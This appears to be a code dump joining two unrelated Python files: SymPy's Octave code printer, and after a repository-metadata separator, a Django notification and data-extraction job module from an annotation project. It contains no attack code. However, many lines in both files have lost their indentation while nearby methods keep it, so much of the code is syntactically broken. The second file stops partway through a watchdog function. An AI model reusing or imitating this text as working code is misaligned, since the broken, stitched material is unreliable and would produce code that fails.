# Note: contract is for expressing tensors as loops (if True), or just
# assignment (if False). FIXME: this should be looked a more carefully
# for Octave.
def __init__(self, settings={}):
super(OctaveCodePrinter, self).__init__(settings)
self.known_functions = dict(zip(known_fcns_src1, known_fcns_src1))
self.known_functions.update(dict(known_fcns_src2))
userfuncs = settings.get('user_functions', {})
self.known_functions.update(userfuncs)
def _rate_index_position(self, p):
return p*5
def _get_statement(self, codestring):
return "%s;" % codestring
def _get_comment(self, text):
return "% {0}".format(text)
def _declare_number_const(self, name, value):
return "{0} = {1};".format(name, value)
def _format_code(self, lines):
return self.indent_code(lines)
def _traverse_matrix_indices(self, mat):
# Octave uses Fortran order (column-major)
rows, cols = mat.shape
return ((i, j) for j in range(cols) for i in range(rows))
def _get_loop_opening_ending(self, indices):
open_lines = []
close_lines = []
for i in indices:
# Octave arrays start at 1 and end at dimension
var, start, stop = map(self._print,
[i.label, i.lower + 1, i.upper + 1])
open_lines.append("for %s = %s:%s" % (var, start, stop))
close_lines.append("end")
return open_lines, close_lines
    def _print_Mul(self, expr):
        """Print a product, choosing between Octave's matrix operators
        (``*``, ``/``) and element-wise operators (``.*``, ``./``) depending
        on whether the neighboring factors are plain numbers.
        """
        # print complex numbers nicely in Octave
        if (expr.is_number and expr.is_imaginary and
                expr.as_coeff_Mul()[0].is_integer):
            return "%si" % self._print(-S.ImaginaryUnit*expr)
        # cribbed from str.py
        prec = precedence(expr)
        c, e = expr.as_coeff_Mul()
        if c < 0:
            # pull a negative coefficient out as a leading "-" sign
            expr = _keep_coeff(-c, e)
            sign = "-"
        else:
            sign = ""
        a = []  # items in the numerator
        b = []  # items that are in the denominator (if any)
        if self.order not in ('old', 'none'):
            args = expr.as_ordered_factors()
        else:
            # use make_args in case expr was something like -x -> x
            args = Mul.make_args(expr)
        # Gather args for numerator/denominator
        for item in args:
            if (item.is_commutative and item.is_Pow and item.exp.is_Rational
                    and item.exp.is_negative):
                # negative rational exponents move the factor to the denominator
                if item.exp != -1:
                    b.append(Pow(item.base, -item.exp, evaluate=False))
                else:
                    b.append(Pow(item.base, -item.exp))
            elif item.is_Rational and item is not S.Infinity:
                # split p/q across numerator and denominator
                if item.p != 1:
                    a.append(Rational(item.p))
                if item.q != 1:
                    b.append(Rational(item.q))
            else:
                a.append(item)
        a = a or [S.One]
        a_str = [self.parenthesize(x, prec) for x in a]
        b_str = [self.parenthesize(x, prec) for x in b]
        # from here it differs from str.py to deal with "*" and ".*"
        def multjoin(a, a_str):
            # here we probably are assuming the constants will come first
            r = a_str[0]
            for i in range(1, len(a)):
                # use plain "*" only when the left-hand factor is a number
                mulsym = '*' if a[i-1].is_number else '.*'
                r = r + mulsym + a_str[i]
            return r
        if len(b) == 0:
            return sign + multjoin(a, a_str)
        elif len(b) == 1:
            divsym = '/' if b[0].is_number else './'
            return sign + multjoin(a, a_str) + divsym + b_str[0]
        else:
            # multi-factor denominator needs parentheses
            divsym = '/' if all([bi.is_number for bi in b]) else './'
            return (sign + multjoin(a, a_str) +
                    divsym + "(%s)" % multjoin(b, b_str))
    def _print_Pow(self, expr):
        """Print a power, using ``sqrt``/reciprocal shortcuts for exponents
        1/2, -1/2 and -1, and ``^`` vs ``.^`` depending on whether every
        operand is a plain number.
        """
        powsymbol = '^' if all([x.is_number for x in expr.args]) else '.^'
        PREC = precedence(expr)
        if expr.exp == S.Half:
            return "sqrt(%s)" % self._print(expr.base)
        if expr.is_commutative:
            if expr.exp == -S.Half:
                sym = '/' if expr.base.is_number else './'
                return "1" + sym + "sqrt(%s)" % self._print(expr.base)
            if expr.exp == -S.One:
                sym = '/' if expr.base.is_number else './'
                return "1" + sym + "%s" % self.parenthesize(expr.base, PREC)
        return '%s%s%s' % (self.parenthesize(expr.base, PREC), powsymbol,
                           self.parenthesize(expr.exp, PREC))
def _print_MatPow(self, expr):
PREC = precedence(expr)
return '%s^%s' % (self.parenthesize(expr.base, PREC),
self.parenthesize(expr.exp, PREC))
def _print_Pi(self, expr):
return 'pi'
def _print_ImaginaryUnit(self, expr):
return "1i"
def _print_Exp1(self, expr):
return "exp(1)"
def _print_GoldenRatio(self, expr):
# FIXME: how to do better, e.g., for octave_code(2*GoldenRatio)?
#return self._print((1+sqrt(S(5)))/2)
return "(1+sqrt(5))/2"
    def _print_NumberSymbol(self, expr):
        """Print a number symbol either inline as a numeric literal (at the
        configured precision) or, in non-inline mode, via the base-class
        path that declares it as a named constant.
        """
        if self._settings["inline"]:
            return self._print(expr.evalf(self._settings["precision"]))
        else:
            # assign to a variable, perhaps more readable for longer program
            return super(OctaveCodePrinter, self)._print_NumberSymbol(expr)
    def _print_Assignment(self, expr):
        """Print ``lhs = rhs;``, expanding a Piecewise right-hand side into
        an if/else block (non-inline mode) and generating index loops for
        Indexed contractions when ``contract`` is enabled.
        """
        from sympy.functions.elementary.piecewise import Piecewise
        from sympy.tensor.indexed import IndexedBase
        # Copied from codeprinter, but remove special MatrixSymbol treatment
        lhs = expr.lhs
        rhs = expr.rhs
        # We special case assignments that take multiple lines
        if not self._settings["inline"] and isinstance(expr.rhs, Piecewise):
            # Here we modify Piecewise so each expression is now
            # an Assignment, and then continue on the print.
            expressions = []
            conditions = []
            for (e, c) in rhs.args:
                expressions.append(Assignment(lhs, e))
                conditions.append(c)
            temp = Piecewise(*zip(expressions, conditions))
            return self._print(temp)
        if self._settings["contract"] and (lhs.has(IndexedBase) or
                rhs.has(IndexedBase)):
            # Here we check if there is looping to be done, and if so
            # print the required loops.
            return self._doprint_loops(rhs, lhs)
        else:
            lhs_code = self._print(lhs)
            rhs_code = self._print(rhs)
            return self._get_statement("%s = %s" % (lhs_code, rhs_code))
def _print_Infinity(self, expr):
return 'inf'
def _print_NegativeInfinity(self, expr):
return '-inf'
def _print_NaN(self, expr):
return 'NaN'
def _print_list(self, expr):
return '{' + ', '.join(self._print(a) for a in expr) + '}'
_print_tuple = _print_list
_print_Tuple = _print_list
def _print_BooleanTrue(self, expr):
return "true"
def _print_BooleanFalse(self, expr):
return "false"
def _print_bool(self, expr):
return str(expr).lower()
# Could generate quadrature code for definite Integrals?
#_print_Integral = _print_not_supported
    def _print_MatrixBase(self, A):
        """Print a dense matrix literal, with special cases for empty,
        1x1, single-row and single-column matrices.
        """
        # Handle zero dimensions:
        if (A.rows, A.cols) == (0, 0):
            return '[]'
        elif A.rows == 0 or A.cols == 0:
            return 'zeros(%s, %s)' % (A.rows, A.cols)
        elif (A.rows, A.cols) == (1, 1):
            # Octave does not distinguish between scalars and 1x1 matrices
            return self._print(A[0, 0])
        elif A.rows == 1:
            return "[%s]" % A.table(self, rowstart='', rowend='', colsep=' ')
        elif A.cols == 1:
            # note .table would unnecessarily equispace the rows
            return "[%s]" % "; ".join([self._print(a) for a in A])
        return "[%s]" % A.table(self, rowstart='', rowend='',
                                rowsep=';\n', colsep=' ')
def _print_SparseMatrix(self, A):
from sympy.matrices import Matrix
L = A.col_list();
# make row vectors of the indices and entries
I = Matrix([[k[0] + 1 for k in L]])
J = Matrix([[k[1] + 1 for k in L]])
AIJ = Matrix([[k[2] for k in L]])
return "sparse(%s, %s, %s, %s, %s)" % (self._print(I), self._print(J),
self._print(AIJ), A.rows, A.cols)
# FIXME: Str/CodePrinter could define each of these to call the _print
# method from higher up the class hierarchy (see _print_NumberSymbol).
# Then subclasses like us would not need to repeat all this.
_print_Matrix = \
_print_DenseMatrix = \
_print_MutableDenseMatrix = \
_print_ImmutableMatrix = \
_print_ImmutableDenseMatrix = \
_print_MatrixBase
_print_MutableSparseMatrix = \
_print_ImmutableSparseMatrix = \
_print_SparseMatrix
def _print_MatrixElement(self, expr):
return self._print(expr.parent) + '(%s, %s)'%(expr.i+1, expr.j+1)
    def _print_MatrixSlice(self, expr):
        """Print a matrix slice in Octave range syntax ``A(lo:step:hi, ...)``.

        Slices are converted from 0-based end-exclusive to Octave's 1-based
        end-inclusive convention; ``end`` (or a bare ``:``) is used when the
        slice spans the full dimension.
        """
        def strslice(x, lim):
            l = x[0] + 1
            h = x[1]
            step = x[2]
            lstr = self._print(l)
            hstr = 'end' if h == lim else self._print(h)
            if step == 1:
                if l == 1 and h == lim:
                    return ':'
                if l == h:
                    # single row/column: no range needed
                    return lstr
                else:
                    return lstr + ':' + hstr
            else:
                return ':'.join((lstr, self._print(step), hstr))
        return (self._print(expr.parent) + '(' +
                strslice(expr.rowslice, expr.parent.shape[0]) + ', ' +
                strslice(expr.colslice, expr.parent.shape[1]) + ')')
def _print_Indexed(self, expr):
inds = [ self._print(i) for i in expr.indices ]
return "%s(%s)" % (self._print(expr.base.label), ", ".join(inds))
def _print_Idx(self, expr):
return self._print(expr.label)
def _print_Identity(self, expr):
return "eye(%s)" % self._print(expr.shape[0])
def _print_hankel1(self, expr):
return "besselh(%s, 1, %s)" % (self._print(expr.order),
self._print(expr.argument))
def _print_hankel2(self, expr):
return "besselh(%s, 2, %s)" % (self._print(expr.order),
self._print(expr.argument))
# Note: as of 2015, Octave doesn't have spherical Bessel functions
def _print_jn(self, expr):
from sympy.functions import sqrt, besselj
x = expr.argument
expr2 = sqrt(S.Pi/(2*x))*besselj(expr.order + S.Half, x)
return self._print(expr2)
def _print_yn(self, expr):
from sympy.functions import sqrt, bessely
x = expr.argument
expr2 = sqrt(S.Pi/(2*x))*bessely(expr.order + S.Half, x)
return self._print(expr2)
def _print_airyai(self, expr):
return "airy(0, %s)" % self._print(expr.args[0])
def _print_airyaiprime(self, expr):
return "airy(1, %s)" % self._print(expr.args[0])
def _print_airybi(self, expr):
return "airy(2, %s)" % self._print(expr.args[0])
def _print_airybiprime(self, expr):
return "airy(3, %s)" % self._print(expr.args[0])
    def _print_Piecewise(self, expr):
        """Print a Piecewise either as a single masked expression (inline
        mode) or as an if/elseif/else block.

        The final clause must have condition ``True`` so the generated code
        always produces a value.
        """
        if expr.args[-1].cond != True:
            # We need the last conditional to be a True, otherwise the resulting
            # function may not return a result.
            raise ValueError("All Piecewise expressions must contain an "
                             "(expr, True) statement to be used as a default "
                             "condition. Without one, the generated "
                             "expression may not evaluate to anything under "
                             "some condition.")
        lines = []
        if self._settings["inline"]:
            # Express each (cond, expr) pair in a nested Horner form:
            #   (condition) .* (expr) + (not cond) .* (<others>)
            # Expressions that result in multiple statements won't work here.
            ecpairs = ["({0}).*({1}) + (~({0})).*(".format
                (self._print(c), self._print(e))
                for e, c in expr.args[:-1]]
            elast = "%s" % self._print(expr.args[-1].expr)
            pw = " ...\n".join(ecpairs) + elast + ")"*len(ecpairs)
            # Note: current need these outer brackets for 2*pw.  Would be
            # nicer to teach parenthesize() to do this for us when needed!
            return "(" + pw + ")"
        else:
            for i, (e, c) in enumerate(expr.args):
                if i == 0:
                    lines.append("if (%s)" % self._print(c))
                elif i == len(expr.args) - 1 and c == True:
                    lines.append("else")
                else:
                    lines.append("elseif (%s)" % self._print(c))
                code0 = self._print(e)
                lines.append(code0)
                if i == len(expr.args) - 1:
                    lines.append("end")
            return "\n".join(lines)
    def indent_code(self, code):
        """Accepts a string of code or a list of code lines.

        Strings are split into lines, indented, and rejoined; lists are
        returned as a new list of indented lines.  Indentation levels are
        inferred from Octave block keywords (function/if/elseif/else/for
        increase; end/elseif/else decrease).
        """
        # code mostly copied from ccode
        if isinstance(code, string_types):
            code_lines = self.indent_code(code.splitlines(True))
            return ''.join(code_lines)
        tab = " "
        inc_regex = ('^function ', '^if ', '^elseif ', '^else$', '^for ')
        dec_regex = ('^end$', '^elseif ', '^else$')
        # pre-strip left-space from the code
        code = [ line.lstrip(' \t') for line in code ]
        increase = [ int(any([search(re, line) for re in inc_regex]))
                     for line in code ]
        decrease = [ int(any([search(re, line) for re in dec_regex]))
                     for line in code ]
        pretty = []
        level = 0
        for n, line in enumerate(code):
            if line == '' or line == '\n':
                pretty.append(line)
                continue
            # dedent before printing (end/else), indent after (if/for/...)
            level -= decrease[n]
            pretty.append("%s%s" % (tab*level, line))
            level += increase[n]
        return pretty
def octave_code(expr, assign_to=None, **settings):
    r"""Converts `expr` to a string of Octave (or Matlab) code.

    The string uses a subset of the Octave language for Matlab compatibility.

    Parameters
    ==========

    expr : Expr
        A sympy expression to be converted.
    assign_to : optional
        When given, the argument is used as the name of the variable to which
        the expression is assigned.  Can be a string, ``Symbol``,
        ``MatrixSymbol``, or ``Indexed`` type.  This can be helpful for
        expressions that generate multi-line statements.
    precision : integer, optional
        The precision for numbers such as pi [default=16].
    user_functions : dict, optional
        A dictionary where keys are ``FunctionClass`` instances and values are
        their string representations.  Alternatively, the dictionary value can
        be a list of tuples i.e. [(argument_test, cfunction_string)].  See
        below for examples.
    human : bool, optional
        If True, the result is a single string that may contain some constant
        declarations for the number symbols.  If False, the same information is
        returned in a tuple of (symbols_to_declare, not_supported_functions,
        code_text).  [default=True].
    contract: bool, optional
        If True, ``Indexed`` instances are assumed to obey tensor contraction
        rules and the corresponding nested loops over indices are generated.
        Setting contract=False will not generate loops, instead the user is
        responsible to provide values for the indices in the code.
        [default=True].
    inline: bool, optional
        If True, we try to create single-statement code instead of multiple
        statements.  [default=True].

    Examples
    ========

    >>> from sympy import octave_code, symbols, sin, pi
    >>> x = symbols('x')
    >>> octave_code(sin(x).series(x).removeO())
    'x.^5/120 - x.^3/6 + x'

    >>> from sympy import Rational, ceiling, Abs
    >>> x, y, tau = symbols("x, y, tau")
    >>> octave_code((2*tau)**Rational(7, 2))
    '8*sqrt(2)*tau.^(7/2)'

    Note that element-wise (Hadamard) operations are used by default between
    symbols.  This is because its very common in Octave to write "vectorized"
    code.  It is harmless if the values are scalars.

    >>> octave_code(sin(pi*x*y), assign_to="s")
    's = sin(pi*x.*y);'

    If you need a matrix product "*" or matrix power "^", you can specify the
    symbol as a ``MatrixSymbol``.

    >>> from sympy import Symbol, MatrixSymbol
    >>> n = Symbol('n', integer=True, positive=True)
    >>> A = MatrixSymbol('A', n, n)
    >>> octave_code(3*pi*A**3)
    '(3*pi)*A^3'

    This class uses several rules to decide which symbol to use for a product.
    Pure numbers use "*", Symbols use ".*" and MatrixSymbols use "*".
    A HadamardProduct can be used to specify componentwise multiplication ".*"
    of two MatrixSymbols.  There is currently no easy way to specify scalar
    symbols, so sometimes the code might have some minor cosmetic issues.
    For example, suppose x and y are scalars and A is a Matrix, then while
    a human programmer might write "(x^2*y)*A^3", we generate:

    >>> octave_code(x**2*y*A**3)
    '(x.^2.*y)*A^3'

    Matrices are supported using Octave inline notation.  When using
    ``assign_to`` with matrices, the name can be specified either as a string
    or as a ``MatrixSymbol``.  The dimensions must align in the latter case.

    >>> from sympy import Matrix, MatrixSymbol
    >>> mat = Matrix([[x**2, sin(x), ceiling(x)]])
    >>> octave_code(mat, assign_to='A')
    'A = [x.^2 sin(x) ceil(x)];'

    ``Piecewise`` expressions are implemented with logical masking by default.
    Alternatively, you can pass "inline=False" to use if-else conditionals.
    Note that if the ``Piecewise`` lacks a default term, represented by
    ``(expr, True)`` then an error will be thrown.  This is to prevent
    generating an expression that may not evaluate to anything.

    >>> from sympy import Piecewise
    >>> pw = Piecewise((x + 1, x > 0), (x, True))
    >>> octave_code(pw, assign_to=tau)
    'tau = ((x > 0).*(x + 1) + (~(x > 0)).*(x));'

    Note that any expression that can be generated normally can also exist
    inside a Matrix:

    >>> mat = Matrix([[x**2, pw, sin(x)]])
    >>> octave_code(mat, assign_to='A')
    'A = [x.^2 ((x > 0).*(x + 1) + (~(x > 0)).*(x)) sin(x)];'

    Custom printing can be defined for certain types by passing a dictionary of
    "type" : "function" to the ``user_functions`` kwarg.  Alternatively, the
    dictionary value can be a list of tuples i.e., [(argument_test,
    cfunction_string)].  This can be used to call a custom Octave function.

    >>> from sympy import Function
    >>> f = Function('f')
    >>> g = Function('g')
    >>> custom_functions = {
    ...   "f": "existing_octave_fcn",
    ...   "g": [(lambda x: x.is_Matrix, "my_mat_fcn"),
    ...         (lambda x: not x.is_Matrix, "my_fcn")]
    ... }
    >>> mat = Matrix([[1, x]])
    >>> octave_code(f(x) + g(x) + g(mat), user_functions=custom_functions)
    'existing_octave_fcn(x) + my_fcn(x) + my_mat_fcn([1 x])'

    Support for loops is provided through ``Indexed`` types.  With
    ``contract=True`` these expressions will be turned into loops, whereas
    ``contract=False`` will just print the assignment expression that should be
    looped over:

    >>> from sympy import Eq, IndexedBase, Idx, ccode
    >>> len_y = 5
    >>> y = IndexedBase('y', shape=(len_y,))
    >>> t = IndexedBase('t', shape=(len_y,))
    >>> Dy = IndexedBase('Dy', shape=(len_y-1,))
    >>> i = Idx('i', len_y-1)
    >>> e = Eq(Dy[i], (y[i+1]-y[i])/(t[i+1]-t[i]))
    >>> octave_code(e.rhs, assign_to=e.lhs, contract=False)
    'Dy(i) = (y(i + 1) - y(i))./(t(i + 1) - t(i));'
    """
    return OctaveCodePrinter(settings).doprint(expr, assign_to)
def print_octave_code(expr, **settings):
    """Print (to stdout) the Octave/Matlab representation of ``expr``.

    See ``octave_code`` for the meaning of the optional arguments.
    """
    code = octave_code(expr, **settings)
    print(code)
| bsd-3-clause |
Lsquared13/nbproject | apps/base/jobs.py | 1 | 19665 | """
jobs.py - base notification routines
Author
Sacha Zyto <sacha@csail.mit.edu>
License
Copyright (c) 2010-2012 Massachusetts Institute of Technology.
MIT License (cf. MIT-LICENSE.txt or http://www.opensource.org/licenses/mit-license.php)
"""
import sys,os
import datetime
if "." not in sys.path:
sys.path.append(".")
if "DJANGO_SETTINGS_MODULE" not in os.environ or __name__=="__main__":
os.environ['DJANGO_SETTINGS_MODULE'] = 'nbsite.settings'
from django.conf import settings
import base.utils as utils, base.models as M
from django.template.loader import render_to_string
from django.core.mail import EmailMessage
from django.db.models import Max
from django.db.models.deletion import Collector
from django.db.utils import IntegrityError
from django.db import transaction
# Human-readable labels for the comment visibility levels (Comment.type).
VISIBILITY = {1: "Myself", 2: "Staff", 3: "Class"}
# Objects whose insert failed with an IntegrityError; retried by
# do_pending_inserts once more of their FK targets have been written.
pending_inserts = []
def extract_obj(o, from_class, cut_at):
    """Recursively walk the objects related to ``o`` and tally them by class.

    NOTE(review): ``from_class`` and ``cut_at`` are currently unused, and
    ``extracted`` is rebuilt on every recursive call, so the per-class
    de-duplication does not span recursion levels -- cyclic relations could
    recurse indefinitely.  Confirm intent before relying on this helper.
    """
    # inspired by http://stackoverflow.com/a/2315053/768104
    extracted = {}
    print "pulling objects related to %s" % (o,)
    links = [rel.get_accessor_name() for rel in o._meta.get_all_related_objects()]
    for link in links:
        rel_objects = getattr(o, link).all()
        for ro in rel_objects:
            classname = ro.__class__.__name__
            if classname not in extracted:
                extracted[classname]={}
            if ro.id not in extracted[classname]:
                extracted[classname][ro.id]=1
                extract_obj(ro, classname, cut_at)
from django.db.models.fields.related import ForeignKey
def duplicate(objs, using_src, using_dest, special_handlers):
#adapted from http://stackoverflow.com/a/6064096/768104
collector = Collector(using_src)
collector.collect(objs)
collector.sort()
related_models = collector.data.keys()
duplicate_order = reversed(related_models)
extracted = {}
for model in duplicate_order:
# Find all FKs on model that point to a related_model.
fks = []
for f in model._meta.fields:
if isinstance(f, ForeignKey) and f.rel.to not in related_models:
fks.append(f)
# Replace each `sub_obj` with a duplicate.
if model not in collector.data:
continue
sub_objects = collector.data[model]
for obj in sub_objects:
for fk in fks:
rel_obj = getattr(obj, fk.name)
rel_cls = rel_obj.__class__
if rel_cls not in extracted:
extracted[rel_cls]={}
if rel_obj is not None and rel_obj.id not in extracted[rel_cls]:
extracted[rel_cls][rel_obj.id]=True
rel_obj.save(using=using_dest)
#print "-> saved related object %s" % (rel_obj,)
#now ready to insert obj:
if model not in extracted:
extracted[model]={}
if obj is not None and obj.id not in extracted[model]:
extracted[model][obj.id]=True
try:
obj.save(using=using_dest)
except IntegrityError as e:
pending_inserts.append(obj)
print "%s done TOTAL objects written: %s " % (model.__name__, sum([len(extracted[i]) for i in extracted]))
do_pending_inserts(using_dest)
def do_pending_inserts(using):
    """Retry saving objects whose earlier insert hit an IntegrityError.

    Objects that still fail are kept in the module-level ``pending_inserts``
    list so a later pass (once more of their FK targets exist) can retry
    them; objects that succeed are dropped from the queue.
    """
    global pending_inserts
    new_pending = []
    for o in pending_inserts:
        try:
            o.save(using=using)
        except IntegrityError as e:
            new_pending.append(o)
    # Bug fix: new_pending was previously discarded, so successfully saved
    # objects stayed queued and were re-saved on every subsequent call.
    pending_inserts = new_pending
def do_extract(t_args):
    """Copy a hard-coded list of ensembles (and their related objects) from
    the 'default' database alias into the 'sel' alias.

    NOTE(review): ``objs_dest`` is computed but unused -- it only serves as
    a sanity check that the objects now exist in 'sel'.  The
    ``insert_parent_comments`` handler is passed to ``duplicate`` via
    ``special_handlers``, which ``duplicate`` currently ignores.
    """
    objs = [(M.Ensemble, 237), ]
    objs_src = [o[0].objects.using("default").get(pk=o[1]) for o in objs]
    def insert_parent_comments(o, using_dest):
        # Walk up the reply chain and save ancestors root-first so FK
        # constraints on Comment.parent are satisfied.
        ancestors = []
        c = o.parent
        while c is not None:
            ancestors.append(c)
            c = c.parent
        for c2 in reversed(ancestors):
            c2.save(using=using_dest)
        print "Special Comment case: inserted %s parent comments" % (len(ancestors),)
    duplicate(objs_src, "default", "sel", {M.Comment: insert_parent_comments})
    objs_dest = [o[0].objects.using("sel").get(pk=o[1]) for o in objs]
def do_dumpensemble(t_args):
    """Serialize the ensembles in ``ensemble_ids`` -- plus their users,
    folders, sections, memberships, sources, locations, comments, thread
    marks and ratings -- to ``ensembles.json`` as JSON fixtures.
    """
    ensemble_ids = (3756, 3840) #Add ensembles here.
    from django.core import serializers
    Serializer = serializers.get_serializer("json")
    serializer = Serializer()
    f = open("ensembles.json", "w");
    ensembles = M.Ensemble.objects.filter(id__in=ensemble_ids).distinct()
    serializer.serialize(ensembles, indent=1, stream=f)
    # Users: only non-sensitive fields are exported (no password/salt).
    o = M.User.objects.filter(membership__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f, fields=("id", "firstname", "lastname", "email", "guest", "valid"))
    o = M.Folder.objects.filter(ownership__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.Section.objects.filter(membership__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.Membership.objects.filter(ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.Source.objects.filter(ownership__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.HTML5Info.objects.filter(source__ownership__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.Ownership.objects.filter(ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.Location.objects.filter(ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.HTML5Location.objects.filter(location__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.Comment.objects.filter(location__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.ThreadMark.objects.filter(comment__location__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    o = M.ReplyRating.objects.filter(comment__location__ensemble__in=ensembles).distinct()
    serializer.serialize(o, indent=1, stream=f)
    f.close()
def do_watchdog(t_args):
    """Run the PDF-processing watchdog checks, bracketed by log banners."""
    when = datetime.datetime.now()
    print """
---------------------- WATCHDOG NOTIFICATIONS FOR %s -----------------""" % (when, )
    do_watchdog_longpdfprocess()
    do_watchdog_notstartedpdfprocess()
    print "--------------- END OF WATCHDOG NOTIFICATIONS FOR %s -----------------" % (when, )
def do_immediate(t_args):
    """Run every 'immediate' (per-event) notification pass, with log banners.

    The commented-out calls are notification types that are not enabled.
    """
    when = datetime.datetime.now()
    print """
---------------------- IMMEDIATE NOTIFICATIONS FOR %s -----------------""" % (when, )
    do_auth_immediate()
    do_reply_immediate()
    ##do_answerplease_immediate()
    ##do_unclear_immediate()
    do_all_immediate()
    print "--------------- END OF IMMEDIATE NOTIFICATIONS FOR %s -----------------" % (when, )
def do_digest(t_args):
    """Run the 'digest' notification passes.

    NOTE(review): every digest pass is currently commented out, so this
    job only prints its banners.
    """
    when = datetime.datetime.now()
    print """
---------------------- DIGEST NOTIFICATIONS FOR %s -----------------""" % (when, )
    #do_auth_digest()
    #do_reply_digest()
    ##do_answerplease_digest()
    ##do_unclear_digest()
    print "--------------- END OF DIGEST NOTIFICATIONS FOR %s -----------------" % (when, )
def do_auth_immediate():
    """Email each author a confirmation for notes posted since the last
    'auth_immediate' run, honoring the per-user notification setting
    (value 2 means "send immediately"), then advance the watermark.
    """
    latestCtime = M.Comment.objects.all().aggregate(Max("ctime"))["ctime__max"]
    latestNotif = M.Notification.objects.get(type="auth_immediate")
    # Raw correlated subquery: the user's 'email_confirmation_author'
    # setting, falling back to the site-wide default when unset.
    setting_qry = "select coalesce(value, (select value from base_defaultsetting where name='email_confirmation_author')) from base_user u left join base_usersetting us on us.user_id=u.id and us.setting_id=(select id from base_defaultsetting where name='email_confirmation_author') where u.id=base_comment.author_id"
    comments = M.Comment.objects.extra(select={"setting_value": setting_qry}).filter(ctime__gt=latestNotif.atime)
    V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
    for c in (o for o in comments if o.setting_value==2): #django doesn't let us filter by extra parameters yet
        msg = render_to_string("email/msg_auth_immediate",{"V":V, "c": c, "visibility": VISIBILITY[c.type]})
        email = EmailMessage("You've posted a new note on NB...",
                             msg,
                             settings.EMAIL_FROM,
                             (c.author.email, ),
                             (settings.EMAIL_BCC, ))
        email.send()
        try:
            print msg
        except UnicodeEncodeError:
            print "not displaying msg b/c of unicode issues"
    latestNotif.atime = latestCtime
    latestNotif.save()
def do_all_immediate():
    """Email ensemble admins about every new non-private comment posted in
    their ensemble since the last 'all_immediate' run (setting value 2 means
    "send immediately"), then advance the watermark.
    """
    #send email to for all new msg in group where I'm an admin
    latestCtime = M.Comment.objects.all().aggregate(Max("ctime"))["ctime__max"]
    latestNotif = M.Notification.objects.get(type="all_immediate")
    # type__gt=1 excludes comments visible only to their author.
    comments = M.Comment.objects.filter(ctime__gt=latestNotif.atime, type__gt=1)
    V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
    # Raw correlated subquery: per-member 'email_confirmation_all' setting
    # with fallback to the site-wide default.
    setting_qry = "select coalesce(value, (select value from base_defaultsetting where name='email_confirmation_all')) from base_user u left join base_usersetting us on us.user_id=u.id and us.setting_id=(select id from base_defaultsetting where name='email_confirmation_all') where u.id=base_membership.user_id"
    for c in comments:
        memberships = M.Membership.objects.extra(select={"setting_value": setting_qry}).filter(ensemble=c.location.ensemble, admin=True).exclude(user=c.author) #we don't want to send a notice to a faculty for a comment that he wrote !
        for m in (o for o in memberships if o.setting_value==2): #django doesn't let us filter by extra parameters yet
            msg = render_to_string("email/msg_all_immediate",{"V":V, "c": c, "visibility": VISIBILITY[c.type], "m": m})
            email = EmailMessage("%s %s just wrote a comment on %s" % (c.author.firstname, c.author.lastname, c.location.source.title),
                                 msg,
                                 settings.EMAIL_FROM,
                                 (m.user.email, ),
                                 (settings.EMAIL_BCC, ))
            email.send()
            try:
                print msg
            except UnicodeEncodeError:
                print "not displaying msg b/c of unicode issues"
    latestNotif.atime = latestCtime
    latestNotif.save()
def do_reply_immediate():
    """Notify earlier participants in a thread when a new class-visible
    reply (type 3 replying to a type 3 parent) arrives, at most one email
    per participant per thread, then advance the watermark.
    """
    latestCtime = M.Comment.objects.all().aggregate(Max("ctime"))["ctime__max"]
    latestNotif = M.Notification.objects.get(type="reply_immediate")
    # Raw correlated subquery: per-user 'email_confirmation_reply_author'
    # setting with fallback to the site-wide default.
    setting_qry = "select coalesce(value, (select value from base_defaultsetting where name='email_confirmation_reply_author')) from base_user u left join base_usersetting us on us.user_id=u.id and us.setting_id=(select id from base_defaultsetting where name='email_confirmation_reply_author') where u.id=base_comment.author_id"
    recentComments = M.Comment.objects.filter(ctime__gt=latestNotif.atime, type=3, parent__type=3)
    V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
    #TODO: This is ugly: I'd like to keep this vectorized at the DB level, but I don't know how to do it in django, hence the double forloop.
    for rc in recentComments:
        comments = M.Comment.objects.extra(select={"setting_value": setting_qry}).filter(location=rc.location).exclude(author=rc.author)
        emailed_uids=[] #bookkeeping in order not to email N times someone who posted N posts in a thread !
        for c in (o for o in comments if o.setting_value==2): #django doesn't let us filter by extra parameters yet
            if c.author_id not in emailed_uids:
                emailed_uids.append(c.author_id)
                msg = render_to_string("email/msg_reply_immediate",{"V": V, "c":c, "rc":rc})
                email = EmailMessage("New reply on %s" % (c.location.source.title,),
                                     msg, settings.EMAIL_FROM, (c.author.email, ),(settings.EMAIL_BCC, ))
                email.send()
                try:
                    print msg
                except UnicodeEncodeError:
                    print "not displaying msg b/c of unicode issues"
    latestNotif.atime = latestCtime
    latestNotif.save()
def do_watchdog_longpdfprocess():
    """Warn the site admins when a PDF job started >10 minutes ago has not
    completed (only the first such job is reported per run).
    """
    minutes_ago = datetime.datetime.now() - datetime.timedelta(0, 10*60) # 10 minutes ago
    objs = M.Processqueue.objects.filter(started__isnull=False, completed__isnull=True, started__lt=minutes_ago)
    if objs.count() > 0:
        o=objs[0]
        V = {"processtime": datetime.datetime.now()-o.started, "o": o,  "hostname": settings.HOSTNAME }
        msg = render_to_string("email/msg_watchdog_longpdf",V)
        recipients = [i[1] for i in settings.ADMINS]
        email = EmailMessage("NB Watchdog warning: long pdf process",
                             msg,
                             settings.EMAIL_WATCHDOG,
                             recipients,
                             (settings.EMAIL_BCC, ))
